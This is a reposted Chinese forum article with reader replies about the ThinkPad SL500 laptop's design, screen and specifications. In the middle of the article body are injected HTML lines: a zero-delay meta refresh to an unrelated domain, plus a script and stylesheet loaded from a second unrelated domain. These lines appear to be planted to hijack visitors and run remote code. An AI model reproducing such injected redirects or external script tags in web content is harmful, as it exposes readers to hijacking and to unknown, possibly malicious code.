开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

惊爆ThinkPad SL500北京亮相,多图细节分析(转)

消费领域细分ThinkPad SL

ThinkPad SL系列还会是继IdeaPad之后的消费市场上的一支新力军。ThinkPad全新的SL系列,即小企业与个人用户定位的低端型号SL300 SL300报价参数图片群乐SL400 SL400报价参数图片群乐SL500 SL500报价参数图片群乐,而曾经的R系列可能会减少低端型号,与X200 X200报价参数图片群乐共同把持中端价位。在此框架下,ThinkPad终于有13寸的低端系列了,SL系列的价位将在3999元-7999元之间,机器将减少CSS等企业级应用软件,降低成本,使得ThinkPad在市场上更有亲和力。在今天下午的迅驰2发布会上,小黑ThinkPad SL500 ThinkPad SL500报价参数图片群乐首次在国内亮相,下面就请跟随编辑的相机,仔细欣赏这款全新的ThinkPad。
钢琴漆顶盖——相信自己的眼睛,你没看错!
  ThinkPad SL500的顶盖竟然是钢琴漆的!!!这的确出乎我们的意料,在如今钢琴漆流行的年代里,小黑也不甘寂寞,玩起了时尚,只是这么大跨度的变化,让人不知所措,或许这与SL新的定位不无关系,没有闪亮的外壳,如何能打动消费级受众的心呢?
<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

ThinkPad SL500整体风格带有很强的时尚元素
ThinkPad SL500整机加入很多时尚元素
SL500标记
快捷键位置改变
  ThinkPad SL500和以前的ThinkPad相比有很大改变,尤其操作区,快捷键被安放在了左侧,传统的位置则被音箱取代。SL系列全面配备了2x1.5W的大功率音箱,以及双阵列麦克风,充分改善以往ThinkPad在声音外放部分的弱势,我们不禁要问,以后能不能在小黑身上看到harman/kardon?
操控按键的位置并不是在以前的正上方而是键盘两旁
触摸板也有改进
顶盖的联想LOGO真恶~~~~
立体感外观简洁大方 接口没有外露被很好的保护
多少还有些流线型设计
神秘的黑色让ThinkPad SL500看上去更加沉稳
9cell新电池、摄像头
最高可达200万象素的内置摄像头
9Cell三洋电池
15寸宽屏1680分辨率,颜色真的很不错
15.4寸的宽屏的SL500分辨率达到了1680x1050,屏幕效果可谓相当出色,已经与一些娱乐产品有得一拼。
颜色非常饱满,可视角度也很大。
SL500屏幕效果显示
更多细节及SL系列配置
SL300, SL400, SL500三大型号
 SL300, SL400, SL500三大型号的基本配置:

支持Centrino 2 平台

Intel Core 2 Duo处理器

DDR2 667MHz 内存

Intel Turbo Memory

Inte[翔意禁止词语]4500或NVIDIA GeForce 9300图形处理器

Anti-Glare(防眩) 或 VibrantView屏

固定光驱(可选蓝光)

容量可达320GB的5400转硬盘

Gigabit Lan,WWAN,WiMAX,WLAN,BT

HDMI,VGA

ExpressCard,1394,USB

可选200万象素内置摄像头

支持最新的9芯电池

2 x 1.5W扬声器,双阵列麦克风

Lenovo Care软件
原帖由 20080808 于 2008-7-16 21:31 发表
9cell新电池、摄像头最高可达200万象素的内置摄像头

没看出来这个摄像头到底放在哪里了?和T的位置不一样,这个不会是手托那里对着人的那一面吧?!
多重呢 3kg多?
这个价位,这种配置还不错了,等待详细机型的配置和价格表出来再评论~~
xy什么时候能上新机型哇
无线、硬盘、电源的指示灯跑到触摸屏下面去了,那个地方方便看吗?
原帖由 snowolfII 于 2008-7-16 22:32 发表
无线、硬盘、电源的指示灯跑到触摸屏下面去了,那个地方方便看吗?

就是不让你看,看一下还得往下看
原帖由 snowolfII 于 2008-7-16 22:32 发表

哦,我知道了,平时看右手边的,合上盖子后看触摸屏下面的~~感觉还是怪怪的~~~~